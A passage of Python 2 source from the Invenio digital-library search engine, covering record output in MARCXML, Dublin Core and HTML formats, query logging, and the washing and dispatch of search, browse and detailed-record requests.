oai_ids = get_fieldvalues(recID, CFG_OAI_ID_FIELD)
if oai_ids:
out += "<datafield tag=\"%s\" ind1=\"%s\" ind2=\"%s\"><subfield code=\"%s\">%s</subfield></datafield>\n" % \
(CFG_OAI_ID_FIELD[0:3], CFG_OAI_ID_FIELD[3:4], CFG_OAI_ID_FIELD[4:5], CFG_OAI_ID_FIELD[5:6], oai_ids[0])
out += "<datafield tag=\"980\" ind1=\"\" ind2=\"\"><subfield code=\"c\">DELETED</subfield></datafield>\n"
else:
# controlfields
query = "SELECT b.tag,b.value,bb.field_number FROM bib00x AS b, bibrec_bib00x AS bb "\
"WHERE bb.id_bibrec=%s AND b.id=bb.id_bibxxx AND b.tag LIKE '00%%' "\
"ORDER BY bb.field_number, b.tag ASC"
res = run_sql(query, (recID, ))
for row in res:
field, value = row[0], row[1]
value = encode_for_xml(value)
out += """ <controlfield tag="%s">%s</controlfield>\n""" % \
(encode_for_xml(field[0:3]), value)
# datafields
i = 1 # Do not process bib00x and bibrec_bib00x, as
# they are controlfields. So start at bib01x and
# bibrec_bib01x (and set i = 0 at the end of
# the first loop)
for digit1 in range(0, 10):
for digit2 in range(i, 10):
bx = "bib%d%dx" % (digit1, digit2)
bibx = "bibrec_bib%d%dx" % (digit1, digit2)
query = "SELECT b.tag,b.value,bb.field_number FROM %s AS b, %s AS bb "\
"WHERE bb.id_bibrec=%%s AND b.id=bb.id_bibxxx AND b.tag LIKE %%s"\
"ORDER BY bb.field_number, b.tag ASC" % (bx, bibx)
res = run_sql(query, (recID, str(digit1)+str(digit2)+'%'))
field_number_old = -999
field_old = ""
for row in res:
field, value, field_number = row[0], row[1], row[2]
ind1, ind2 = field[3], field[4]
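# Illustrative example: for a stored tag such as '700__a', field[3] and field[4] are the
# indicators ('_' here, normalized to spaces below) and field[-1:] is the subfield code 'a'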
if ind1 == "_" or ind1 == "":
ind1 = " "
if ind2 == "_" or ind2 == "":
ind2 = " "
# print field tag, unless hidden
printme = True
if not can_see_hidden:
for htag in CFG_BIBFORMAT_HIDDEN_TAGS:
ltag = len(htag)
samelenfield = field[0:ltag]
if samelenfield == htag:
printme = False
if printme:
if field_number != field_number_old or field[:-1] != field_old[:-1]:
if field_number_old != -999:
out += """ </datafield>\n"""
out += """ <datafield tag="%s" ind1="%s" ind2="%s">\n""" % \
(encode_for_xml(field[0:3]), encode_for_xml(ind1), encode_for_xml(ind2))
field_number_old = field_number
field_old = field
# print subfield value
value = encode_for_xml(value)
out += """ <subfield code="%s">%s</subfield>\n""" % \
(encode_for_xml(field[-1:]), value)
# all fields/subfields printed in this run, so close the tag:
if field_number_old != -999:
out += """ </datafield>\n"""
i = 0 # Subsequent outer-loop iterations should also cover the bibX0x and bibrec_bibX0x tables
# we are at the end of printing the record:
out += " </record>\n"
elif format == "xd" or format == "oai_dc":
# XML Dublin Core format, possibly OAI -- select only some bibXXx fields:
out += """ <dc xmlns="http://purl.org/dc/elements/1.1/"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://purl.org/dc/elements/1.1/
http://www.openarchives.org/OAI/1.1/dc.xsd">\n"""
if record_exist_p == -1:
out += ""
else:
for f in get_fieldvalues(recID, "041__a"):
out += " <language>%s</language>\n" % f
for f in get_fieldvalues(recID, "100__a"):
out += " <creator>%s</creator>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "700__a"):
out += " <creator>%s</creator>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "245__a"):
out += " <title>%s</title>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "65017a"):
out += " <subject>%s</subject>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "8564_u"):
if f.split('.')[-1] == 'png': # skip links to PNG images
continue
out += " <identifier>%s</identifier>\n" % encode_for_xml(f)
for f in get_fieldvalues(recID, "520__a"):
out += " <description>%s</description>\n" % encode_for_xml(f)
out += " <date>%s</date>\n" % get_creation_date(recID)
out += " </dc>\n"
elif len(format) == 6 and str(format[0:3]).isdigit():
# user has asked to print some fields only
if format == "001":
out += "<!--%s-begin-->%s<!--%s-end-->\n" % (format, recID, format)
else:
vals = get_fieldvalues(recID, format)
for val in vals:
out += "<!--%s-begin-->%s<!--%s-end-->\n" % (format, val, format)
elif format.startswith('t'):
## user directly asked for some tags to be displayed only
if record_exist_p == -1:
out += get_fieldvalues_alephseq_like(recID, ["001", CFG_OAI_ID_FIELD, "980"], can_see_hidden)
else:
out += get_fieldvalues_alephseq_like(recID, ot, can_see_hidden)
elif format == "hm":
if record_exist_p == -1:
out += "\n<pre>" + cgi.escape(get_fieldvalues_alephseq_like(recID, ["001", CFG_OAI_ID_FIELD, "980"], can_see_hidden)) + "</pre>"
else:
out += "\n<pre>" + cgi.escape(get_fieldvalues_alephseq_like(recID, ot, can_see_hidden)) + "</pre>"
elif format.startswith("h") and ot:
## user directly asked for some tags to be displayed only
if record_exist_p == -1:
out += "\n<pre>" + get_fieldvalues_alephseq_like(recID, ["001", CFG_OAI_ID_FIELD, "980"], can_see_hidden) + "</pre>"
else:
out += "\n<pre>" + get_fieldvalues_alephseq_like(recID, ot, can_see_hidden) + "</pre>"
elif format == "hd":
# HTML detailed format
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
# look for detailed format existence:
query = "SELECT value FROM bibfmt WHERE id_bibrec=%s AND format=%s"
res = run_sql(query, (recID, format), 1)
if res:
# record 'recID' is formatted in 'format', so print it
out += "%s" % decompress(res[0][0])
else:
# record 'recID' is not formatted in 'format', so try to call BibFormat on the fly or use default format:
out_record_in_format = call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
if out_record_in_format:
out += out_record_in_format
else:
out += websearch_templates.tmpl_print_record_detailed(
ln = ln,
recID = recID,
)
elif format.startswith("hb_") or format.startswith("hd_"):
# underscore means that HTML brief/detailed formats should be called on-the-fly; suitable for testing formats
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
out += call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
elif format.startswith("hx"):
# BibTeX format, called on the fly:
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
out += call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
elif format.startswith("hs"):
# for citation/download similarity navigation links:
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
out += '<a href="%s">' % websearch_templates.build_search_url(recid=recID, ln=ln)
# firstly, title:
titles = get_fieldvalues(recID, "245__a")
if titles:
for title in titles:
out += "<strong>%s</strong>" % title
else:
# usual title not found, try conference title:
titles = get_fieldvalues(recID, "111__a")
if titles:
for title in titles:
out += "<strong>%s</strong>" % title
else:
# just print record ID:
out += "<strong>%s %d</strong>" % (get_field_i18nname("record ID", ln, False), recID)
out += "</a>"
# secondly, authors:
authors = get_fieldvalues(recID, "100__a") + get_fieldvalues(recID, "700__a")
if authors:
out += " - %s" % authors[0]
if len(authors) > 1:
out += " <em>et al</em>"
# thirdly publication info:
publinfos = get_fieldvalues(recID, "773__s")
if not publinfos:
publinfos = get_fieldvalues(recID, "909C4s")
if not publinfos:
publinfos = get_fieldvalues(recID, "037__a")
if not publinfos:
publinfos = get_fieldvalues(recID, "088__a")
if publinfos:
out += " - %s" % publinfos[0]
else:
# fourthly publication year (if not publication info):
years = get_fieldvalues(recID, "773__y")
if not years:
years = get_fieldvalues(recID, "909C4y")
if not years:
years = get_fieldvalues(recID, "260__c")
if years:
out += " (%s)" % years[0]
else:
# HTML brief format by default
if record_exist_p == -1:
out += _("The record has been deleted.")
else:
query = "SELECT value FROM bibfmt WHERE id_bibrec=%s AND format=%s"
res = run_sql(query, (recID, format))
if res:
# record 'recID' is formatted in 'format', so print it
out += "%s" % decompress(res[0][0])
else:
# record 'recID' is not formatted in 'format', so try to call BibFormat on the fly, or use the default format:
if CFG_WEBSEARCH_CALL_BIBFORMAT:
out_record_in_format = call_bibformat(recID, format, ln, search_pattern=search_pattern,
user_info=user_info, verbose=verbose)
if out_record_in_format:
out += out_record_in_format
else:
out += websearch_templates.tmpl_print_record_brief(
ln = ln,
recID = recID,
)
else:
out += websearch_templates.tmpl_print_record_brief(
ln = ln,
recID = recID,
)
# at the end of HTML brief mode, print the "Detailed record" functionality:
if format == 'hp' or format.startswith("hb_") or format.startswith("hd_"):
pass # do nothing for portfolio and on-the-fly formats
else:
out += websearch_templates.tmpl_print_record_brief_links(ln=ln,
recID=recID,
sf=sf,
so=so,
sp=sp,
rm=rm,
display_claim_link=display_claim_this_paper)
# print record closing tags, if needed:
if format == "marcxml" or format == "oai_dc":
out += " </metadata>\n"
out += " </record>\n"
return out
def call_bibformat(recID, format="HD", ln=CFG_SITE_LANG, search_pattern=None, user_info=None, verbose=0):
"""
Calls BibFormat and returns formatted record.
BibFormat will decide by itself if old or new BibFormat must be used.
"""
from invenio.bibformat_utils import get_pdf_snippets
keywords = []
if search_pattern is not None:
for unit in create_basic_search_units(None, str(search_pattern), None):
bsu_o, bsu_p, bsu_f, bsu_m = unit[0], unit[1], unit[2], unit[3]
if (bsu_o != '-' and bsu_f in [None, 'fulltext']):
if bsu_m == 'a' and bsu_p.startswith('%') and bsu_p.endswith('%'):
# remove leading and trailing `%' representing partial phrase search
keywords.append(bsu_p[1:-1])
else:
keywords.append(bsu_p)
out = format_record(recID,
of=format,
ln=ln,
search_pattern=keywords,
user_info=user_info,
verbose=verbose)
if CFG_WEBSEARCH_FULLTEXT_SNIPPETS and user_info and \
'fulltext' in user_info['uri'].lower():
# check snippets only if URL contains fulltext
# FIXME: make it work for CLI too, via new function arg
if keywords:
snippets = ''
try:
snippets = get_pdf_snippets(recID, keywords, user_info)
except:
register_exception()
if snippets:
out += snippets
return out
def log_query(hostname, query_args, uid=-1):
"""
Log query into the query and user_query tables.
Return id_query or None in case of problems.
"""
id_query = None
if uid >= 0:
# log the query only if uid is reasonable
res = run_sql("SELECT id FROM query WHERE urlargs=%s", (query_args,), 1)
try:
id_query = res[0][0]
except:
id_query = run_sql("INSERT INTO query (type, urlargs) VALUES ('r', %s)", (query_args,))
if id_query:
run_sql("INSERT INTO user_query (id_user, id_query, hostname, date) VALUES (%s, %s, %s, %s)",
(uid, id_query, hostname,
time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())))
return id_query
def log_query_info(action, p, f, colls, nb_records_found_total=-1):
"""Write some info to the log file for later analysis."""
try:
log = open(CFG_LOGDIR + "/search.log", "a")
log.write(time.strftime("%Y%m%d%H%M%S#", time.localtime()))
log.write(action+"#")
log.write(p+"#")
log.write(f+"#")
for coll in colls[:-1]:
log.write("%s," % coll)
log.write("%s#" % colls[-1])
log.write("%d" % nb_records_found_total)
log.write("\n")
log.close()
except:
pass
return
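# Example log line produced above (illustrative): "20140101123456#SEARCH#ellis#author#Theses,Books#42"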
def clean_dictionary(dictionary, list_of_items):
"""Returns a copy of the dictionary with all the items
in the list_of_items as empty strings"""
out_dictionary = dictionary.copy()
out_dictionary.update((item, '') for item in list_of_items)
return out_dictionary
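# Illustrative example: clean_dictionary({'p1': 'ellis', 'p2': 'muon'}, ['p2']) returns
# {'p1': 'ellis', 'p2': ''} and leaves the input dictionary untouched.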
### CALLABLES
def perform_request_search(req=None, cc=CFG_SITE_NAME, c=None, p="", f="", rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS, sf="", so="d", sp="", rm="", of="id", ot="", aas=0,
p1="", f1="", m1="", op1="", p2="", f2="", m2="", op2="", p3="", f3="", m3="", sc=0, jrec=0,
recid=-1, recidb=-1, sysno="", id=-1, idb=-1, sysnb="", action="", d1="",
d1y=0, d1m=0, d1d=0, d2="", d2y=0, d2m=0, d2d=0, dt="", verbose=0, ap=0, ln=CFG_SITE_LANG, ec=None, tab="",
wl=0, em=""):
"""Perform search or browse request, without checking for
authentication. Return list of recIDs found, if of=id.
Otherwise create web page.
The arguments are as follows:
req - mod_python Request class instance.
cc - current collection (e.g. "ATLAS"). The collection the
user started to search/browse from.
c - collection list (e.g. ["Theses", "Books"]). The
collections user may have selected/deselected when
starting to search from 'cc'.
p - pattern to search for (e.g. "ellis and muon or kaon").
f - field to search within (e.g. "author").
rg - records in groups of (e.g. "10"). Defines how many hits
per collection in the search results page are
displayed. (Note that `rg' is ignored in case of `of=id'.)
sf - sort field (e.g. "title").
so - sort order ("a"=ascending, "d"=descending).
sp - sort pattern (e.g. "CERN-") -- in case there are more
values in a sort field, this argument tells which one
to prefer
rm - ranking method (e.g. "jif"). Defines whether results
should be ranked by some known ranking method.
of - output format (e.g. "hb"). Usually starting "h" means
HTML output (and "hb" for HTML brief, "hd" for HTML
detailed), "x" means XML output, "t" means plain text
output, "id" means no output at all but to return list
of recIDs found, "intbitset" means to return an intbitset
representation of the recIDs found (no sorting or ranking
will be performed). (Suitable for high-level API.)
ot - output only these MARC tags (e.g. "100,700,909C0b").
Useful if only some fields are to be shown in the
output, e.g. for library to control some fields.
em - output only part of the page.
aas - advanced search ("0" means no, "1" means yes). Whether
search was called from within the advanced search
interface.
p1 - first pattern to search for in the advanced search
interface. Much like 'p'.
f1 - first field to search within in the advanced search
interface. Much like 'f'.
m1 - first matching type in the advanced search interface.
("a" all of the words, "o" any of the words, "e" exact
phrase, "p" partial phrase, "r" regular expression).
op1 - first operator, to join the first and the second unit
in the advanced search interface. ("a" add, "o" or,
"n" not).
p2 - second pattern to search for in the advanced search
interface. Much like 'p'.
f2 - second field to search within in the advanced search
interface. Much like 'f'.
m2 - second matching type in the advanced search interface.
("a" all of the words, "o" any of the words, "e" exact
phrase, "p" partial phrase, "r" regular expression).
op2 - second operator, to join the second and the third unit
in the advanced search interface. ("a" add, "o" or,
"n" not).
p3 - third pattern to search for in the advanced search
interface. Much like 'p'.
f3 - third field to search within in the advanced search
interface. Much like 'f'.
m3 - third matching type in the advanced search interface.
("a" all of the words, "o" any of the words, "e" exact
phrase, "p" partial phrase, "r" regular expression).
sc - split by collection ("0" no, "1" yes). Governs whether
we want to present the results in a single huge list,
or split by collection.
jrec - jump to record (e.g. "234"). Used for navigation
inside the search results. (Note that `jrec' is ignored
in case of `of=id'.)
recid - display record ID (e.g. "20000"). Do not
search/browse but go straight away to the Detailed
record page for the given recID.
recidb - display record ID bis (e.g. "20010"). If greater than
'recid', then display records from recid to recidb.
Useful for example for dumping records from the
database for reformatting.
sysno - display old system SYS number (e.g. ""). If you
migrate to Invenio from another system, and store your
old SYS call numbers, you can use them instead of recid
if you wish so.
id - the same as recid, in case recid is not set. For
backwards compatibility.
idb - the same as recid, in case recidb is not set. For
backwards compatibility.
sysnb - the same as sysno, in case sysno is not set. For
backwards compatibility.
action - action to do. "SEARCH" for searching, "Browse" for
browsing. Default is to search.
d1 - first datetime in full YYYY-mm-dd HH:MM:DD format
(e.g. "1998-08-23 12:34:56"). Useful for search limits
on creation/modification date (see 'dt' argument
below). Note that 'd1' takes precedence over d1y, d1m,
d1d if these are defined.
d1y - first date's year (e.g. "1998"). Useful for search
limits on creation/modification date.
d1m - first date's month (e.g. "08"). Useful for search
limits on creation/modification date.
d1d - first date's day (e.g. "23"). Useful for search
limits on creation/modification date.
d2 - second datetime in full YYYY-mm-dd HH:MM:DD format
(e.g. "1998-09-02 12:34:56"). Useful for search limits
on creation/modification date (see 'dt' argument
below). Note that 'd2' takes precedence over d2y, d2m,
d2d if these are defined.
d2y - second date's year (e.g. "1998"). Useful for search
limits on creation/modification date.
d2m - second date's month (e.g. "09"). Useful for search
limits on creation/modification date.
d2d - second date's day (e.g. "02"). Useful for search
limits on creation/modification date.
dt - first and second date's type (e.g. "c"). Specifies
whether to search in creation dates ("c") or in
modification dates ("m"). When dt is not set and d1*
and d2* are set, the default is "c".
verbose - verbose level (0=min, 9=max). Useful to print some
internal information on the searching process in case
something goes wrong.
ap - alternative patterns (0=no, 1=yes). In case no exact
match is found, the search engine can try alternative
patterns e.g. to replace non-alphanumeric characters by
a boolean query. ap defines if this is wanted.
ln - language of the search interface (e.g. "en"). Useful
for internationalization.
ec - list of external search engines to search as well
(e.g. "SPIRES HEP").
wl - wildcard limit (e.g. 100): wildcard queries will be
limited to at most this many results
"""
kwargs = prs_wash_arguments(req=req, cc=cc, c=c, p=p, f=f, rg=rg, sf=sf, so=so, sp=sp, rm=rm, of=of, ot=ot, aas=aas,
p1=p1, f1=f1, m1=m1, op1=op1, p2=p2, f2=f2, m2=m2, op2=op2, p3=p3, f3=f3, m3=m3, sc=sc, jrec=jrec,
recid=recid, recidb=recidb, sysno=sysno, id=id, idb=idb, sysnb=sysnb, action=action, d1=d1,
d1y=d1y, d1m=d1m, d1d=d1d, d2=d2, d2y=d2y, d2m=d2m, d2d=d2d, dt=dt, verbose=verbose, ap=ap, ln=ln, ec=ec,
tab=tab, wl=wl, em=em)
return prs_perform_search(kwargs=kwargs, **kwargs)
def prs_perform_search(kwargs=None, **dummy):
"""Internal call which does the search, it is calling standard Invenio;
Unless you know what you are doing, don't use this call as an API
"""
# wash the collection arguments separately, because this step can also be called independently
out = prs_wash_arguments_colls(kwargs=kwargs, **kwargs)
if not out:
return out
return prs_search(kwargs=kwargs, **kwargs)
def prs_wash_arguments_colls(kwargs=None, of=None, req=None, cc=None, c=None, sc=None, verbose=None,
aas=None, ln=None, em="", **dummy):
"""
Check and wash collection list argument before we start searching.
If there are troubles, e.g. a collection is not defined, print
warning to the browser.
@return: True if collection list is OK, and various False values
(empty string, empty list) if there was an error.
"""
# raise an exception when trying to print out html from the cli
if of.startswith("h"):
assert req
# for every search engine request asking for an HTML output, we
# first regenerate cache of collection and field I18N names if
# needed; so that later we won't bother checking timestamps for
# I18N names at all:
if of.startswith("h"):
collection_i18nname_cache.recreate_cache_if_needed()
field_i18nname_cache.recreate_cache_if_needed()
try:
(cc, colls_to_display, colls_to_search, hosted_colls, wash_colls_debug) = wash_colls(cc, c, sc, verbose) # which colls to search and to display?
kwargs['colls_to_display'] = colls_to_display
kwargs['colls_to_search'] = colls_to_search
kwargs['hosted_colls'] = hosted_colls
kwargs['wash_colls_debug'] = wash_colls_debug
except InvenioWebSearchUnknownCollectionError, exc:
colname = exc.colname
if of.startswith("h"):
page_start(req, of, cc, aas, ln, getUid(req),
websearch_templates.tmpl_collection_not_found_page_title(colname, ln))
req.write(websearch_templates.tmpl_collection_not_found_page_body(colname, ln))
page_end(req, of, ln, em)
return ''
elif of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
page_end(req, of, ln, em)
return ''
else:
page_end(req, of, ln, em)
return ''
return True
def prs_wash_arguments(req=None, cc=CFG_SITE_NAME, c=None, p="", f="", rg=CFG_WEBSEARCH_DEF_RECORDS_IN_GROUPS,
sf="", so="d", sp="", rm="", of="id", ot="", aas=0,
p1="", f1="", m1="", op1="", p2="", f2="", m2="", op2="", p3="", f3="", m3="",
sc=0, jrec=0, recid=-1, recidb=-1, sysno="", id=-1, idb=-1, sysnb="", action="", d1="",
d1y=0, d1m=0, d1d=0, d2="", d2y=0, d2m=0, d2d=0, dt="", verbose=0, ap=0, ln=CFG_SITE_LANG,
ec=None, tab="", uid=None, wl=0, em="", **dummy):
"""
Sets the (default) values and checks others for the PRS call
"""
# wash output format:
of = wash_output_format(of)
# wash all arguments requiring special care
p = wash_pattern(p)
f = wash_field(f)
p1 = wash_pattern(p1)
f1 = wash_field(f1)
p2 = wash_pattern(p2)
f2 = wash_field(f2)
p3 = wash_pattern(p3)
f3 = wash_field(f3)
(d1y, d1m, d1d, d2y, d2m, d2d) = map(int, (d1y, d1m, d1d, d2y, d2m, d2d))
datetext1, datetext2 = wash_dates(d1, d1y, d1m, d1d, d2, d2y, d2m, d2d)
# wash ranking method:
if not is_method_valid(None, rm):
rm = ""
# backwards compatibility: id, idb, sysnb -> recid, recidb, sysno (if applicable)
if sysnb != "" and sysno == "":
sysno = sysnb
if id > 0 and recid == -1:
recid = id
if idb > 0 and recidb == -1:
recidb = idb
# TODO deduce passed search limiting criteria (if applicable)
pl, pl_in_url = "", "" # no limits by default
if action != "browse" and req and not isinstance(req, cStringIO.OutputType) \
and req.args and not isinstance(req.args, dict): # we do not want to add options while browsing or while calling via command-line
fieldargs = cgi.parse_qs(req.args)
for fieldcode in get_fieldcodes():
if fieldargs.has_key(fieldcode):
for val in fieldargs[fieldcode]:
pl += "+%s:\"%s\" " % (fieldcode, val)
pl_in_url += "&%s=%s" % (urllib.quote(fieldcode), urllib.quote(val))
# deduce recid from sysno argument (if applicable):
if sysno: # ALEPH SYS number was passed, so deduce DB recID for the record:
recid = get_mysql_recid_from_aleph_sysno(sysno)
if recid is None:
recid = 0 # use recid 0 to indicate that this sysno does not exist
# deduce collection we are in (if applicable):
if recid > 0:
referer = None
if req:
referer = req.headers_in.get('Referer')
cc = guess_collection_of_a_record(recid, referer)
# deduce user id (if applicable):
if uid is None:
try:
uid = getUid(req)
except:
uid = 0
_ = gettext_set_language(ln)
kwargs = {'req':req,'cc':cc, 'c':c, 'p':p, 'f':f, 'rg':rg, 'sf':sf, 'so':so, 'sp':sp, 'rm':rm, 'of':of, 'ot':ot, 'aas':aas,
'p1':p1, 'f1':f1, 'm1':m1, 'op1':op1, 'p2':p2, 'f2':f2, 'm2':m2, 'op2':op2, 'p3':p3, 'f3':f3, 'm3':m3, 'sc':sc, 'jrec':jrec,
'recid':recid, 'recidb':recidb, 'sysno':sysno, 'id':id, 'idb':idb, 'sysnb':sysnb, 'action':action, 'd1':d1,
'd1y':d1y, 'd1m':d1m, 'd1d':d1d, 'd2':d2, 'd2y':d2y, 'd2m':d2m, 'd2d':d2d, 'dt':dt, 'verbose':verbose, 'ap':ap, 'ln':ln, 'ec':ec,
'tab':tab, 'wl':wl, 'em': em,
'datetext1': datetext1, 'datetext2': datetext2, 'uid': uid, 'cc':cc, 'pl': pl, 'pl_in_url': pl_in_url, '_': _,
'selected_external_collections_infos':None,
}
kwargs.update(**dummy)
return kwargs
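# Illustrative example: prs_wash_arguments(id=1234) maps the legacy 'id' argument onto 'recid'
# (and likewise idb -> recidb, sysnb -> sysno) before building the kwargs dictionary above.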
def prs_search(kwargs=None, recid=0, req=None, cc=None, p=None, p1=None, p2=None, p3=None,
f=None, ec=None, verbose=None, ln=None, selected_external_collections_infos=None,
action=None,rm=None, of=None, em=None,
**dummy):
"""
This function writes various bits into the req object as the search
proceeds (so that pieces of the page are rendered even before the
search has ended)
"""
## 0 - start output
if recid >= 0: # recid can be 0 if deduced from sysno and if such sysno does not exist
output = prs_detailed_record(kwargs=kwargs, **kwargs)
if output is not None:
return output
elif action == "browse":
## 2 - browse needed
of = 'hb'
output = prs_browse(kwargs=kwargs, **kwargs)
if output is not None:
return output
elif rm and p.startswith("recid:"):
## 3-ter - similarity search (or old-style citation search) needed
output = prs_search_similar_records(kwargs=kwargs, **kwargs)
if output is not None:
return output
elif p.startswith("cocitedwith:"): #WAS EXPERIMENTAL
## 3-terter - cited by search needed
output = prs_search_cocitedwith(kwargs=kwargs, **kwargs)
if output is not None:
return output
else:
## 3 - common search needed
output = prs_search_common(kwargs=kwargs, **kwargs)
if output is not None:
return output
# External searches
if of.startswith("h"):
if not of in ['hcs', 'hcs2']:
perform_external_collection_search_with_em(req, cc, [p, p1, p2, p3], f, ec, verbose,
ln, selected_external_collections_infos, em=em)
return page_end(req, of, ln, em)
def prs_detailed_record(kwargs=None, req=None, of=None, cc=None, aas=None, ln=None, uid=None, recid=None, recidb=None,
p=None, verbose=None, tab=None, sf=None, so=None, sp=None, rm=None, ot=None, _=None, em=None,
**dummy):
"""Formats and prints one record"""
## 1 - detailed record display
title, description, keywords = \
websearch_templates.tmpl_record_page_header_content(req, recid, ln)
if req is not None and req.method != 'HEAD':
page_start(req, of, cc, aas, ln, uid, title, description, keywords, recid, tab, em)
# Default format is hb but we are in detailed -> change 'of'
if of == "hb":
of = "hd"
if record_exists(recid):
if recidb <= recid: # sanity check
recidb = recid + 1
if of in ["id", "intbitset"]:
result = [recidx for recidx in range(recid, recidb) if record_exists(recidx)]
if of == "intbitset":
return intbitset(result)
else:
return result
else:
print_records(req, range(recid, recidb), -1, -9999, of, ot, ln, search_pattern=p, verbose=verbose,
tab=tab, sf=sf, so=so, sp=sp, rm=rm, em=em)
if req and of.startswith("h"): # register detailed record page view event
client_ip_address = str(req.remote_ip)
register_page_view_event(recid, uid, client_ip_address)
else: # record does not exist
if of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
elif of.startswith("h"):
if req.method == 'HEAD':
raise apache.SERVER_RETURN, apache.HTTP_NOT_FOUND
else:
write_warning(_("Requested record does not seem to exist."), req=req)
def prs_browse(kwargs=None, req=None, of=None, cc=None, aas=None, ln=None, uid=None, _=None, p=None,
p1=None, p2=None, p3=None, colls_to_display=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, pl=None,
d1y=None, d1m=None, d1d=None, d2y=None, d2m=None, d2d=None,
dt=None, jrec=None, ec=None, action=None,
colls_to_search=None, verbose=None, em=None, **dummy):
page_start(req, of, cc, aas, ln, uid, _("Browse"), p=create_page_title_search_pattern_info(p, p1, p2, p3), em=em)
req.write(create_search_box(cc, colls_to_display, p, f, rg, sf, so, sp, rm, of, ot, aas, ln, p1, f1, m1, op1,
p2, f2, m2, op2, p3, f3, m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec, action,
em
))
write_warning(create_exact_author_browse_help_link(p, p1, p2, p3, f, f1, f2, f3,
rm, cc, ln, jrec, rg, aas, action),
req=req)
try:
if aas == 1 or (p1 or p2 or p3):
browse_pattern(req, colls_to_search, p1, f1, rg, ln)
browse_pattern(req, colls_to_search, p2, f2, rg, ln)
browse_pattern(req, colls_to_search, p3, f3, rg, ln)
else:
browse_pattern(req, colls_to_search, p, f, rg, ln)
except:
register_exception(req=req, alert_admin=True)
if of.startswith("h"):
req.write(create_error_box(req, verbose=verbose, ln=ln))
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
return page_end(req, of, ln, em)
def prs_search_similar_records(kwargs=None, req=None, of=None, cc=None, pl_in_url=None, ln=None, uid=None, _=None, p=None,
p1=None, p2=None, p3=None, colls_to_display=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, aas=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, pl=None,
d1y=None, d1m=None, d1d=None, d2y=None, d2m=None, d2d=None,
dt=None, jrec=None, ec=None, action=None, em=None,
verbose=None, **dummy):
if req and req.method != 'HEAD':
page_start(req, of, cc, aas, ln, uid, _("Search Results"), p=create_page_title_search_pattern_info(p, p1, p2, p3),
em=em)
if of.startswith("h"):
req.write(create_search_box(cc, colls_to_display, p, f, rg, sf, so, sp, rm, of, ot, aas, ln, p1, f1, m1, op1,
p2, f2, m2, op2, p3, f3, m3, sc, pl, d1y, d1m, d1d, d2y, d2m, d2d, dt, jrec, ec, action,
em
))
if record_exists(p[6:]) != 1:
# record does not exist
if of.startswith("h"):
if req.method == 'HEAD':
raise apache.SERVER_RETURN, apache.HTTP_NOT_FOUND
else:
write_warning(_("Requested record does not seem to exist."), req=req)
if of == "id":
return []
if of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
else:
# record does exist, so find records similar to it
t1 = os.times()[4]
results_similar_recIDs, results_similar_relevances, results_similar_relevances_prologue, results_similar_relevances_epilogue, results_similar_comments = \
rank_records_bibrank(rm, 0, get_collection_reclist(cc), string.split(p), verbose, f, rg, jrec)
if results_similar_recIDs:
t2 = os.times()[4]
cpu_time = t2 - t1
if of.startswith("h"):
req.write(print_search_info(p, f, sf, so, sp, rm, of, ot, cc, len(results_similar_recIDs),
jrec, rg, aas, ln, p1, p2, p3, f1, f2, f3, m1, m2, m3, op1, op2,
sc, pl_in_url,
d1y, d1m, d1d, d2y, d2m, d2d, dt, cpu_time, em=em))
write_warning(results_similar_comments, req=req)
print_records(req, results_similar_recIDs, jrec, rg, of, ot, ln,
results_similar_relevances, results_similar_relevances_prologue,
results_similar_relevances_epilogue,
search_pattern=p, verbose=verbose, sf=sf, so=so, sp=sp, rm=rm, em=em)
elif of == "id":
return results_similar_recIDs
elif of == "intbitset":
return intbitset(results_similar_recIDs)
elif of.startswith("x"):
print_records(req, results_similar_recIDs, jrec, rg, of, ot, ln,
results_similar_relevances, results_similar_relevances_prologue,
results_similar_relevances_epilogue, search_pattern=p, verbose=verbose,
sf=sf, so=so, sp=sp, rm=rm, em=em)
else:
# rank_records failed and returned some error message to display:
if of.startswith("h"):
write_warning(results_similar_relevances_prologue, req=req)
write_warning(results_similar_relevances_epilogue, req=req)
write_warning(results_similar_comments, req=req)
if of == "id":
return []
elif of == "intbitset":
return intbitset()
elif of.startswith("x"):
# Print empty, but valid XML
print_records_prologue(req, of)
print_records_epilogue(req, of)
def prs_search_cocitedwith(kwargs=None, req=None, of=None, cc=None, pl_in_url=None, ln=None, uid=None, _=None, p=None,
p1=None, p2=None, p3=None, colls_to_display=None, f=None, rg=None, sf=None,
so=None, sp=None, rm=None, ot=None, aas=None, f1=None, m1=None, op1=None,
f2=None, m2=None, op2=None, f3=None, m3=None, sc=None, pl=None,
d1y=None, d1m=None, d1d=None, d2y=None, d2m=None, d2d=None,
dt=None, jrec=None, ec=None, action=None,
verbose=None, em=None, **dummy):
